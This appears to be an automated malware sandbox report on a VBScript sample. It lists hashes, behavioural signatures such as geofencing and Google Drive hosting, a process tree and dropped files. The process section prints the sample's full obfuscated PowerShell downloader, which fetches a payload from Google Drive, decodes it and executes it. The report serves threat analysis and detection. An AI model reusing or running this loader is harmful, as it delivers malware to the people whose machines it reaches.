Analysis
-
max time kernel
94s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
08/06/2024, 07:18
Static task
static1
Behavioral task
behavioral1
Sample
83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
Resource
win10v2004-20240426-en
General
-
Target
83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
-
Size
23KB
-
MD5
70e2991e57991e054e3473a4a9ec2a63
-
SHA1
1fe4276566a2c6e7db0ab8b85cdc7b4de9cf86c1
-
SHA256
83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d
-
SHA512
4f32f979ca9da2bcca42d727f08215f8b652b17d0e98d9e31fe6f5414789731bf9805d8f74990af917ea8c2b0b4f0fa9124101759df17d4c601d90670f76300d
-
SSDEEP
384:AcYk2uAnvIa7Yp000ekqThmLjp45PyUi6KkNXmNYXkfRf:Acx2p57qQqejpAPyUi6BNXxUft
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2528 WScript.exe 9 4808 powershell.exe 16 4808 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 drive.google.com 9 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4808 powershell.exe 4808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4808 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2528 wrote to memory of 4808 2528 WScript.exe 84 PID 2528 wrote to memory of 4808 2528 WScript.exe 84 PID 4808 wrote to memory of 4776 4808 powershell.exe 87 PID 4808 wrote to memory of 4776 4808 powershell.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 'cylindeiAntisipespionsax Lkkers ';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena Lemlstz.ackeysoKildeskl ynenefe Opslmm ');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha undervvRaakremaCrookintSre ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"3⤵PID:4776
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5b98730add3fdac807aa8a524679c31c7
SHA10027f4bf52d43ea2aaee06a78c4dca190799e5f9
SHA2568a6d3e18638460134e0ca1020b5d2ed00246327d28516b7181423e6a16ebeeed
SHA512546bc8b8b3dd9d6f5a870794ad38b30ff0e052be9d00b3e5d6e35a8ca417970b86456e39d1bc6a5fb652b4d9b5765d3b47fc43033a0a151db9791df64b0b92d3
-
Filesize
494B
MD5290fae52f17dbaeec503dfb5d085abff
SHA1fdae242a21f6383d0d5aab98f1bf1f3768d833b6
SHA256d2390d6c0c3ba3ae1422d582888dcadcb05c387567e3000eb148da64aeb364e9
SHA5127f6d352a85b7fb6c5f5d5d2d76bd081a525ff941b28f481d166a054dbbdcbe0aa4640ea6eb31b226d59f94a4cd5a549df9f041880e481ff397294a048a7a280b
-
Filesize
3KB
MD5e3c54d10d7b28f4437e5082454a22cb7
SHA1f5d6c9ff3d8bebf64c7a03416e005aea2f72f82e
SHA2564641feef049099ee8406644631ffb5a83d07c631c29f15490824d649c52c868b
SHA512f26f744f344c692551d23f0d8281f27bd2bd6de2263b89c1642f3196ac90c28337019e5d47e9b88cf2e607b5a3e70f3c30f9ee94fb9fae43b4f3a351cd309fc6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82